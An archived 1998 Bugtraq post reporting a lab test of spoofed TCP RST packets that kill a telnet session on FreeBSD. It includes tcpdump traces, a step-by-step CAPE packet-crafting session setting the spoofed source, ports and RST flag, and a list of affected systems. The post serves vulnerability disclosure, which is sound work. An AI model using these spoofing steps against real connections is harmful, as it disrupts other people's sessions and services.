Bugtraq mailing list archives

Re: FreeBSD's RST validation

From: oliver () SECNET COM (Oliver Friedrichs)
Date: Mon, 31 Aug 1998 13:36:35 -0600


Darren Reed brought this up in June, 1997, on the NetBSD security list,
after which I performed some tests.  I ended up with a number of
questions after doing this, but never followed up to determine what was
going on.

Anyways, here's my old message

- Oliver
  Network Associates, Inc.

------

Ok, here's how my tests turned out:

I have 3 systems involved:

199.185.231.20 - OpenBSD system
199.185.231.24 - FreeBSD system
199.185.231.25 - BSDI system

I'm telneted from BSDI to FreeBSD, and monitoring and spoofing from
the OpenBSD system using tcpdump and CAPE.

20:25:01.261260 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: P 2752239993:2752239994(1) ack 4220895731 win 8760 
<nop,nop,timestamp 750118 2277749> [tos 0x10]
20:25:01.263337 freebsd.secnet.com.telnet > bsdi.secnet.com.3349: P 1:55(54) ack 1 win 17376 <nop,nop,timestamp 2278005 
750118> (DF) [tos 0x10]

So I'm logged into FreeBSD from port 3349 on the BSDI system.  On OpenBSD..

bash# ./cape -i
Welcome to CAPE.  "help" for general help, "help topic" for help on topic

Active network interfaces:
   - Interface: lo0 Address: 127.0.0.1
   - Interface: ed2 Address: 199.185.231.20

cape> iface=ed2
cape> gateway=199.185.231.24
cape> ip
cape> ip_src=199.185.231.23
cape> ip_dst=199.185.231.24
cape> ip_proto=IPPROTO_TCP
cape> tcp
cape> tcp_sport=3349
cape> tcp_dport=23
cape> tcp_flags=RST
cape> send
Processing: Packet transmitted

Here's my spoofed packet with random seq/ack numbers:

20:28:20.885563 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: R 1649760492:1649760492(0) win 4096

As soon as I hit a key on the FreeBSD system...

[20:25:01] [freebsd]
[/usr/local/scanner] % Connection closed by foreign host.

Poof, it works, repeatable every time.  This works when spoofing the
packet from the BSDI system TO the FreeBSD system.  For some reason
(which I've been unable to figure out yet, I cannot spoof packets
from the FreeBSD system to the BSDI system and have this work).
This works between OpenBSD and FreeBSD however (both ways).
This doesn't work against Solaris.

Here's what I found with the systems here:

OpenBSD 2.1 - vulnerable
FreeBSD 2.1.x - vulnerable
BSDI        - appears not vulnerable (?)
Solaris 2.5 - appears not vulnerable
IRIX    6.2 - appears not vulnerable
Linux       - appears not vulnerable
Windows NT  - appears not vulnerable

Current thread:

Re: Buffer overflows in Minicom 1.80.1, (continued)
- - - Re: Buffer overflows in Minicom 1.80.1 Wichert Akkerman (Aug 31)
    - buffer overflow in nslookup? Peter van Dijk (Aug 29)
    - Re: buffer overflow in nslookup? Brandon Reynolds (Aug 29)
    - Re: buffer overflow in nslookup? Peter van Dijk (Aug 30)
    - FreeBSD's RST validation Tristan Horn (Aug 30)
    - Re: FreeBSD's RST validation James Snow (Aug 30)
    - Re: FreeBSD's RST validation Tristan Horn (Aug 30)
    - port scanning. (fwd) Darren Reed (Aug 31)
    - Re: FreeBSD's RST validation Andrey Alekseyev (Aug 31)
    - Re: FreeBSD's RST validation Diane Bruce (Aug 30)
    - Re: FreeBSD's RST validation Oliver Friedrichs (Aug 31)
    - SEYON vulnerability in TurboLinux 2.0 Scott Stone (Aug 30)
    - Re: buffer overflow in nslookup? www.devoid.net (Aug 30)
    - Re: buffer overflow in nslookup? Benjamin J Stassart (Aug 30)
    - Re: buffer overflow in nslookup? Theo de Raadt (Aug 31)
    - Re: buffer overflow in nslookup? Uwe Ohse (Aug 31)
    - Hole in Oracle Server/Developer 2000 - authentication protocol. Yaron Yanay (Aug 31)
    - Re: buffer overflow in nslookup? Willy TARREAU (Aug 31)
- PTL Advisory: NetManage ZPOP v1.0 ekiM (Aug 25)
- Administrivia Aleph One (Aug 25)
- SV: Serious Security Hole in Hotmail Jonathan James (Aug 25)